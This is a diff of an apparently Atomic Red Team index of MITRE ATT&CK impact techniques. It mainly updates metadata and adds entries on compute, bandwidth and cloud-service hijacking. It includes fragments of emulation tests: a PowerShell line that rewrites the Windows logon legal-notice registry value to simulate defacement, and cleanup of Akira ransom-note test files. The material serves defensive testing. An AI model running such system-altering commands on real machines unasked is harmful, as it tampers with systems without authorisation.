-        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
-        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
-          in the Wild. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T15:42:23.001Z'
       name: Application or System Exploitation
       description: "Adversaries may exploit software vulnerabilities that can cause
         an application or system to crash and deny availability to users. (Citation:
@@ -94318,13 +95075,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Attacks targeting web applications may generate logs in the
         web server, application server, and/or database server that can be used to
         identify the type of attack. Externally monitor the availability of services
         that may be targeted by an Endpoint DoS.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -94332,36 +95096,27 @@ impact:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1565.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
       type: attack-pattern
-      created: '2020-03-02T14:30:05.252Z'
+      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+      created: '2020-02-20T15:37:27.052Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.003
-        url: https://attack.mitre.org/techniques/T1565/003
-      - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-        url: https://content.fireeye.com/apt/rpt-apt38
-        source_name: FireEye APT38 Oct 2018
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1499/004
+        external_id: T1499.004
+      - source_name: Sucuri BIND9 August 2015
+        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+          in the Wild. Retrieved April 26, 2019.
+        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1565.003:
+    technique:
+      modified: '2024-10-15T18:21:43.760Z'
       name: Runtime Data Manipulation
       description: |-
         Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
@@ -94370,11 +95125,17 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Inspect important application binary file hashes, locations,
         and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'File: File Deletion'
@@ -94383,17 +95144,31 @@ impact:
       - 'File: File Creation'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - root
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+      created: '2020-03-02T14:30:05.252Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/003
+        external_id: T1565.003
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1498.002:
     technique:
-      modified: '2023-03-30T21:01:41.052Z'
+      modified: '2024-10-15T16:04:34.495Z'
       name: Reflection Amplification
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
@@ -94402,6 +95177,7 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
         before the traffic volume is sufficient to cause impact to the availability
         of the service, but such response time typically requires very aggressive
@@ -94417,17 +95193,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Sensor Health: Host Status'
       - 'Network Traffic: Network Traffic Flow'
@@ -94437,14 +95208,15 @@ impact:
       id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
       created: '2020-03-02T20:08:03.691Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1498/002
         external_id: T1498.002
-      - source_name: Cloudflare ReflectionDoS May 2017
-        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
-          (attacks). Retrieved April 23, 2019.
-        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       - source_name: Cloudflare DNSamplficationDoS
         description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
           April 23, 2019.
@@ -94453,28 +95225,28 @@ impact:
         description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
           April 23, 2019.
         url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+      - source_name: Cloudflare ReflectionDoS May 2017
+        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+          (attacks). Retrieved April 23, 2019.
+        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cloudflare Memcrashed Feb 2018
+        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
       - source_name: Arbor AnnualDoSreport Jan 2018
         description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
           Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
           into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
           Infrastructure Security Report. Retrieved April 22, 2019.
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-      - source_name: Cloudflare Memcrashed Feb 2018
-        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
-          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
-        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
-      - source_name: Cisco DoSdetectNetflow
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1499.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:05:48.014Z'
       name: Service Exhaustion Flood
       description: |-
         Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
@@ -94485,7 +95257,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -94496,17 +95267,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -94543,7 +95309,8 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491:
     technique:
@@ -94564,7 +95331,7 @@ impact:
       - source_name: mitre-attack
         external_id: T1491
         url: https://attack.mitre.org/techniques/T1491
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:42.056Z'
       name: Defacement
       description: "Adversaries may modify visual content available internally or
         externally to an enterprise network, thus affecting the integrity of the original
@@ -94591,12 +95358,78 @@ impact:
       x_mitre_impact_type:
       - Integrity
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+    atomic_tests: []
+  T1496.002:
+    technique:
+      modified: '2024-09-25T14:59:35.287Z'
+      name: Bandwidth Hijacking
+      description: "Adversaries may leverage the network bandwidth resources of co-opted
+        systems to complete resource-intensive tasks, which may impact system and/or
+        hosted service availability. \n\nAdversaries may also use malware that leverages
+        a system's network bandwidth as part of a botnet in order to facilitate [Network
+        Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+        to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+        in proxyjacking by selling use of the victims' network bandwidth and IP address
+        to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+        in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+        Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+        financial costs or availability disruptions, this technique may cause reputational
+        damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+        Proxyjacking)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      - IaaS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'File: File Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Connection Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+      created: '2024-09-25T13:44:35.412Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/002
+        external_id: T1496.002
+      - source_name: Sysdig Proxyjacking
+        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+          Chat. Retrieved July 6, 2023.
+        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+      - source_name: Unit 42 Leaked Environment Variables 2024
+        description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+          Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+          Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+        url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+      - source_name: GoBotKR
+        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1657:
     technique:
-      modified: '2024-04-11T20:22:14.359Z'
+      modified: '2024-10-15T15:58:10.254Z'
       name: Financial Theft
       description: "Adversaries may steal monetary resources from targets through
         extortion, social engineering, technical theft, or other methods aimed at
@@ -94629,7 +95462,7 @@ impact:
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
       - Pawel Partyka, Microsoft Threat Intelligence
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -94639,10 +95472,9 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
@@ -94705,7 +95537,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1491.001:
     technique:
@@ -94746,7 +95577,7 @@ impact:
         messages. Since internally defacing systems exposes an adversary''s presence,
         it often takes place after other intrusion goals have been accomplished.(Citation:
         Novetta Blockbuster Destructive Malware)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-28T18:55:35.988Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Defacement: Internal Defacement'
       x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -94767,7 +95598,6 @@ impact:
       - Integrity
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1491.001
     atomic_tests:
     - name: Replace Desktop Wallpaper
@@ -94858,6 +95688,155 @@ impact:
           Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $orgLegalNoticeText -Type String -Force
         name: powershell
         elevation_required: true
+  T1496.004:
+    technique:
+      modified: '2024-10-16T17:59:27.535Z'
+      name: Cloud Service Hijacking
+      description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+        applications to complete resource-intensive tasks, which may impact hosted
+        service availability. \n\nFor example, adversaries may leverage email and
+        messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+        Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+        spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+        messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+        2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+        in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+        AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+        2024)\n\nIn some cases, adversaries may leverage services that the victim
+        is already using. In others, particularly when the service is part of a larger
+        cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+        2024) Leveraging SaaS applications may cause the victim to incur significant
+        financial costs, use up service quotas, and otherwise impact availability. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+      created: '2024-09-25T14:05:59.910Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/004
+        external_id: T1496.004
+      - source_name: SentinelLabs SNS Sender 2024
+        description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+          Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+        url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+      - source_name: Lacework LLMJacking 2024
+        description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+          with Composite Alerts. Retrieved September 25, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+      - source_name: Sysdig LLMJacking 2024
+        description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+          (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+      - source_name: Permiso SES Abuse 2023
+        description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+          25, 2024.
+        url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.001:
+    technique:
+      modified: '2024-10-13T16:58:38.820Z'
+      name: Compute Hijacking
+      description: "Adversaries may leverage the compute resources of co-opted systems
+        to complete resource-intensive tasks, which may impact system and/or hosted
+        service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        is to validate transactions of cryptocurrency networks and earn virtual currency.
+        Adversaries may consume enough system resources to negatively impact and/or
+        cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+        Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+        because of the high potential for available resources, but user endpoint systems
+        may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+        environments may also be targeted due to the ease of deployment via exposed
+        APIs and the potential for scaling mining activities by deploying or compromising
+        multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+        Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+        cryptocurrency mining malware identify then kill off processes for competing
+        malware to ensure it’s not competing for resources.(Citation: Trend Micro
+        War of Crypto Miners)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Network Traffic: Network Connection Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Sensor Health: Host Status'
+      - 'Process: Process Creation'
+      - 'File: File Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+      created: '2024-09-25T13:34:30.100Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/001
+        external_id: T1496.001
+      - source_name: Unit 42 Hildegard Malware
+        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+      - source_name: CloudSploit - Unused AWS Regions
+        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+          Retrieved October 8, 2019.
+        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+          17, 2019.
+        url: https://securelist.com/lazarus-under-the-hood/77908/
+      - source_name: Trend Micro Exposed Docker APIs
+        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+          via Exposed APIs. Retrieved April 6, 2021.
+        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+      - source_name: Trend Micro War of Crypto Miners
+        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+          Miners: A Battle for Resources. Retrieved April 6, 2021.'
+        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1565:
     technique:
       modified: '2024-02-02T17:18:39.004Z'
@@ -94910,11 +95889,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1531:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:35:13.577Z'
       name: Account Access Removal
       description: "Adversaries may interrupt availability of system and network resources
         by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -94937,6 +95915,7 @@ impact:
         phase_name: impact
       x_mitre_contributors:
       - Hubert Mank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -94954,9 +95933,10 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      x_mitre_version: '1.2'
+      - IaaS
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -94982,9 +95962,8 @@ impact:
         url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1531
     atomic_tests:
     - name: Change User Password - Windows
@@ -95166,7 +96145,7 @@ impact:
         NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
         compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
         Part 1)"
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T13:07:10.318Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data Encrypted for Impact
       x_mitre_detection: |-
@@ -95190,7 +96169,6 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1486
     atomic_tests:
     - name: PureLocker Ransom Note
@@ -95322,7 +96300,7 @@ impact:
         cleanup_command: "del $env:Userprofile\\Desktop\\akira_readme.txt \ndel c:\\test.*.akira\n"
   T1499:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:56:47.424Z'
       name: Endpoint Denial of Service
       description: |
         Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -95341,7 +96319,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Alfredo Oliveira, Trend Micro
       - David Fiser, @anu4is, Trend Micro
@@ -95358,18 +96335,13 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.1'
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -95393,8 +96365,8 @@ impact:
       - source_name: FSISAC FraudNetDoS September 2012
         description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
           Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
       - source_name: ArsTechnica Great Firewall of China
         description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
           on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -95414,33 +96386,22 @@ impact:
         url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
